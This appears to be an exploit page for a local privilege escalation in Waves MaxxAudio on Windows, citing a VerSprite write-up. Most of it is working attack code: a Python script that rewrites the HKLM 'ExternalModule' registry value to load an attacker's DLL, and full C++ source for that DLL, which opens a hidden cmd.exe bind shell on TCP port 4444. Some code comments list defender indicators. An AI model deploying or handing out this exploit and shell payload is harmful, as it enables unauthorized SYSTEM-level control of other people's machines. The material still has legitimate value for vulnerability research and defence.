Waves Maxx Audio LPE to System (Windows)

Write Up: VerSprite | Waves Maxx Audio
Advisories: VerSprite, CVEDETAILS

Comments: When exploited, this vulnerability can lead to SYSTEM-privileged access on the compromised device. I am not sure why “CVEDETAILS” rates this with a CVSS of only 4.4 when the other LPE to SYSTEM is a 7.7….

python WavesMaxxAudio-PoC.py

import sys
import winreg
 
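def set_registry(src,value_name,value_data):
    """Write a REG_SZ value under HKLM\\<src> through the 64-bit registry view.

    Args:
        src: Subkey path relative to HKEY_LOCAL_MACHINE.
        value_name: Name of the value to set.
        value_data: String stored as REG_SZ.

    Returns:
        True once the value has been written.

    Raises:
        OSError: if the key cannot be opened for writing (PermissionError when
            the caller lacks write access to the key) or the write itself fails.
            On a key with a correct ACL this is the call that should fail for a
            non-elevated caller; the PoC presumably relies on the key being
            writable — confirm against the linked advisory.
    """
    # The key handle is a context manager, so it is closed even when
    # SetValueEx raises instead of leaking until interpreter exit.
    with winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_WRITE | winreg.KEY_WOW64_64KEY
    ) as registry_key:
        winreg.SetValueEx(registry_key, value_name, 0, winreg.REG_SZ, value_data)
    return True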
 
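def read_registry(src,value_name):
    """Read a value under HKLM\\<src> through the 64-bit registry view.

    Args:
        src: Subkey path relative to HKEY_LOCAL_MACHINE.
        value_name: Name of the value to query.

    Returns:
        The value's data only; the registry type reported by QueryValueEx is
        discarded, so a caller cannot tell REG_SZ from REG_EXPAND_SZ here.

    Raises:
        OSError: if the key cannot be opened or the value does not exist
            (FileNotFoundError in the latter case).
    """
    # Context manager closes the handle even if QueryValueEx raises.
    with winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_READ | winreg.KEY_WOW64_64KEY
    ) as registry_key:
        value_data, _value_type = winreg.QueryValueEx(registry_key, value_name)
    return value_data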
 
def main():
    """Print the current ExternalModule value, overwrite it, then print it again.

    Expects exactly one command-line argument (a DLL path). The value written is
    ``"<argv[1]>;KblCoefsRender51164.dll;MaxxAudio5"`` under
    ``HKLM\\SOFTWARE\\Waves Audio\\MaxxAudio\\General``. What consumes that value
    afterwards is not shown in this script; see the linked write-up.

    NOTE(review): the original value is only printed, never saved, and there is
    no restore path. Record the pre-change value before the write so the key
    can be put back after testing.
    """
    # Usage error exits with status 0, so a caller cannot distinguish it from success.
    if(len(sys.argv) < 2):
        print("Incorrect usage.\nUsage: WavesMaxxAudio-PoC.py <path_to_malicious_dll>")
        sys.exit(0)
 
    user_malicious_dll_path = sys.argv[1]
    # argv[1] is used verbatim, with no check that the path exists or is a DLL.
    reg_value_data = user_malicious_dll_path + ";KblCoefsRender51164.dll;MaxxAudio5"
    reg_src = r"SOFTWARE\Waves Audio\MaxxAudio\General"
    reg_value_name = "ExternalModule"
 
    print("[!] PoC for Waves MaxxAudio LPE")
    
    # Read before the write: this is the value a defender would want preserved.
    print("[*] Reading Current registry key value:")
    print(read_registry(reg_src,reg_value_name))
    
    # Write to HKLM; on a correctly ACL'd key this raises PermissionError for a
    # non-elevated caller, which is the check that the vulnerable key lacks.
    print("[*] Writing malicious key value now")
    set_registry(reg_src,reg_value_name,reg_value_data)
 
    # Read back to confirm the write took effect.
    print("[*] Overwrite Finished:\n[*] Reading new key value data now")
    print(read_registry(reg_src,reg_value_name))
 
if __name__ == "__main__":
    # Report Ctrl-C during the registry operations instead of dumping a traceback.
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted')
        raise SystemExit(0)

Malicious DLL

#include "stdafx.h"
#include <thread>
#include <shellapi.h>
#include <winsock2.h>
 
#pragma comment(lib,"ws2_32")
 
/*
 * Listen on TCP port 4444 on every interface, accept one connection and
 * attach a hidden cmd.exe to it (stdin/stdout/stderr all redirected to the
 * accepted socket). No return value is checked anywhere in this function,
 * so any failure is silent.
 *
 * Defender notes (what this looks like on a host):
 *  - a LISTENING socket on 0.0.0.0:4444 owned by whatever process loaded
 *    this DLL, followed by a child cmd.exe of that process;
 *  - the child inherits the socket handle (bInheritHandles == true), so
 *    the shell's I/O is the network connection, not a console.
 */
void bind_shell() {
 
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in sin;
 
    // Winsock 2.2; result ignored.
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
 
    // INADDR_ANY: binds on all local interfaces, not just loopback.
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons((u_short)4444);
 
    bind(sock, (SOCKADDR*)& sin, sizeof(sin));
    listen(sock, SOMAXCONN);
 
    // accept() blocks until a client connects; only the first connection is served.
    SOCKET tmp = accept(sock, 0, 0);
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
 
    // Hidden window; all three standard handles point at the accepted socket.
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = (HANDLE)tmp;
    si.hStdError = (HANDLE)tmp;
    si.hStdInput = (HANDLE)tmp;
 
    // Child runs under the same token as the hosting process; the page's
    // premise is that this host is SYSTEM — confirm against the write-up.
    TCHAR commandLine[256] = L"cmd.exe";
    CreateProcess(NULL, commandLine, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
 
    // Parent drops its process/thread handles and its copy of the accepted
    // socket; the listening socket `sock` is never closed here.
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(tmp);
 
    return;
}
 
/*
 * DLL entry point. ul_reason_for_call is never inspected, so bind_shell()
 * runs on every notification (process attach/detach and thread attach/
 * detach alike), and because bind_shell() blocks in accept(), the call
 * blocks inside DllMain while the loader lock is held. All parameters are
 * otherwise unused. Returns TRUE unconditionally.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    bind_shell();
    return TRUE;
}
